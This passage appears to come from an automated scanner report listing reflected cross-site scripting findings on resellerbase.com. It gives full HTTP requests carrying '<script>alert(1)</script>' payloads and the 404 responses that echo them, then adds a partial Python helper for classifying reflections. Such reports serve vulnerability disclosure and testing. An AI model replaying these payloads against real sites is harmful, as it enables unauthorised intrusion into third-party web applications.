Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/themes/kosmos/images/rating/0.gif?941da<script>alert(1)</script>1c77daabb2=1 was not found on this server.</p>
...[SNIP]...

2.1115. http://www.resellerbase.com/detail/14/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55df1<script>alert(1)</script>e03d4136324 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail55df1<script>alert(1)</script>e03d4136324/14/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail55df1<script>alert(1)</script>e03d4136324/14/ was not found on this server.</p>
...[SNIP]...

2.1116. http://www.resellerbase.com/detail/14/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2eb56<script>alert(1)</script>0fde6e27157 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/142eb56<script>alert(1)</script>0fde6e27157/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/142eb56<script>alert(1)</script>0fde6e27157/ was not found on this server.</p>
...[SNIP]...

2.1117. http://www.resellerbase.com/detail/14/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload af2e1<script>alert(1)</script>8694570e64f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/?af2e1<script>alert(1)</script>8694570e64f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/?af2e1<script>alert(1)</script>8694570e64f=1 was not found on this server.</p>
...[SNIP]...

2.1118. http://www.resellerbase.com/detail/14/datingrev-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/datingrev-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c4c29<script>alert(1)</script>42008f864ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc4c29<script>alert(1)</script>42008f864ae/14/datingrev-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc4c29<script>alert(1)</script>42008f864ae/14/datingrev-com.html was not found on this server.</p>
...[SNIP]...

2.1119. http://www.resellerbase.com/detail/14/datingrev-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/14/datingrev-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1a326<a>ce38da080d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/141a326<a>ce38da080d2/datingrev-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/141a326<a>ce38da080d2/datingrev-com.html was not found on this server.</p>
...[SNIP]...

2.1120. http://www.resellerbase.com/detail/14/datingrev-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/datingrev-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f1bed<script>alert(1)</script>1368baf4c64 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/f1bed<script>alert(1)</script>1368baf4c64 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/f1bed<script>alert(1)</script>1368baf4c64 was not found on this server.</p>
...[SNIP]...

2.1121. http://www.resellerbase.com/detail/14/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e7d62<script>alert(1)</script>24e750c2bed435e88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; it was possible to convert it to GET, which makes the attack easier to demonstrate and deliver.

Request

GET /detaile7d62<script>alert(1)</script>24e750c2bed435e88/14/rating.php?id=14&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile7d62<script>alert(1)</script>24e750c2bed435e88/14/rating.php?id=14&rating=5 was not found on this server.</p>
...[SNIP]...

2.1122. http://www.resellerbase.com/detail/14/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc278<script>alert(1)</script>78fae996c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailcc278<script>alert(1)</script>78fae996c8/14/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailcc278<script>alert(1)</script>78fae996c8/14/rating.php was not found on this server.</p>
...[SNIP]...

2.1123. http://www.resellerbase.com/detail/14/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 665dd<script>alert(1)</script>f62439e47601b2ecf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; it was possible to convert it to GET, which makes the attack easier to demonstrate and deliver.

Request

GET /detail/14665dd<script>alert(1)</script>f62439e47601b2ecf/rating.php?id=14&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14665dd<script>alert(1)</script>f62439e47601b2ecf/rating.php?id=14&rating=5 was not found on this server.</p>
...[SNIP]...

2.1124. http://www.resellerbase.com/detail/14/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ffc10<script>alert(1)</script>e13095e7a7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14ffc10<script>alert(1)</script>e13095e7a7c/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14ffc10<script>alert(1)</script>e13095e7a7c/rating.php was not found on this server.</p>
...[SNIP]...

2.1125. http://www.resellerbase.com/detail/14/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2001b<script>alert(1)</script>ae285068959f30304 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; it was possible to convert it to GET, which makes the attack easier to demonstrate and deliver.

Request

GET /detail/14/rating.php2001b<script>alert(1)</script>ae285068959f30304?id=14&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/rating.php2001b<script>alert(1)</script>ae285068959f30304?id=14&rating=5 was not found on this server.</p>
...[SNIP]...

2.1126. http://www.resellerbase.com/detail/14/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cb011<script>alert(1)</script>de6fd049c74 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/rating.phpcb011<script>alert(1)</script>de6fd049c74 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/rating.phpcb011<script>alert(1)</script>de6fd049c74 was not found on this server.</p>
...[SNIP]...

2.1127. http://www.resellerbase.com/detail/14/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf790<script>alert(1)</script>51768e5a41a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/rating.php?bf790<script>alert(1)</script>51768e5a41a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/rating.php?bf790<script>alert(1)</script>51768e5a41a=1 was not found on this server.</p>
...[SNIP]...

2.1128. http://www.resellerbase.com/detail/14/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f2727<script>alert(1)</script>82e2f25e80868e11d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; it was possible to convert it to GET, which makes the attack easier to demonstrate and deliver.

Request

GET /detail/14/rating.php/f2727<script>alert(1)</script>82e2f25e80868e11d?id=14&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/rating.php/f2727<script>alert(1)</script>82e2f25e80868e11d?id=14&rating=5 was not found on this server.</p>
...[SNIP]...

2.1129. http://www.resellerbase.com/detail/14/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4dd2e<script>alert(1)</script>892878db225 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4dd2e<script>alert(1)</script>892878db225/14/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4dd2e<script>alert(1)</script>892878db225/14/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1130. http://www.resellerbase.com/detail/14/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c7d43<script>alert(1)</script>e62b1daed5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14c7d43<script>alert(1)</script>e62b1daed5e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14c7d43<script>alert(1)</script>e62b1daed5e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1131. http://www.resellerbase.com/detail/14/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/14/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 71148<script>alert(1)</script>d51bf8b874f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/search.php71148<script>alert(1)</script>d51bf8b874f?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/search.php71148<script>alert(1)</script>d51bf8b874f?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1132. http://www.resellerbase.com/detail/14/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/14/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 85b04<a>0355537e803 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/search.php?keyword=search...&Submit3=Search85b04<a>0355537e803&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/search.php?keyword=search...&Submit3=Search85b04<a>0355537e803&opt=2 was not found on this server.</p>
...[SNIP]...
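
The two findings above show the report's two confidence levels side by side: in 2.1131 a complete `<script>alert(1)</script>` comes back intact in text context (Certain), while in 2.1132 only a bare `<a>` was confirmed and the scanner could not land a full script proof-of-concept (Firm). The following Python is an added example, not part of the scanner output and not code from the site. It re-checks a canary payload against a captured response body the way a reviewer would by hand: is the payload present unmodified, does it sit between tags or inside one, and is a whole script element intact. The two `<p>` fragments are copied from the responses of 2.1131 and 2.1132; the function and field names (`check_reflection`, `Reflection`) are assumptions for this example. Note that the 404 status does not reduce exploitability: the body is served as text/html and the browser renders it, script included.

```python
import html
import re
from dataclasses import dataclass

# Response fragments copied from findings 2.1131 and 2.1132 of the report (constructed
# sample input for this example; only the <p> line is reproduced).
BODY_2_1131 = ('<p>The requested URL /detail/14/search.php71148<script>alert(1)</script>'
               'd51bf8b874f?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>')
BODY_2_1132 = ('<p>The requested URL /detail/14/search.php?keyword=search...&Submit3='
               'Search85b04<a>0355537e803&opt=2 was not found on this server.</p>')


@dataclass
class Reflection:
    context: str      # "text", "tag", "encoded" or "absent"
    confidence: str   # "Certain", "Firm", "Tentative" or "None"


def check_reflection(body, payload):
    """Locate the canary payload in the body and judge what an attacker controls there.

    Assumed helper for this example: it mirrors how the report's Confidence column
    was derived, it is not the scanner's own logic.
    """
    idx = body.find(payload)
    if idx == -1:
        # Present only in entity-encoded form: the sink encodes for a text context,
        # so this probe does not break out of it.
        if html.escape(payload, quote=True) in body or html.escape(payload, quote=False) in body:
            return Reflection("encoded", "None")
        return Reflection("absent", "None")

    # If the last '<' before the echo is still unclosed, the echo sits inside a tag
    # (attribute context); otherwise it is text between tags, as the report states.
    before = body[:idx]
    context = "tag" if before.rfind("<") > before.rfind(">") else "text"

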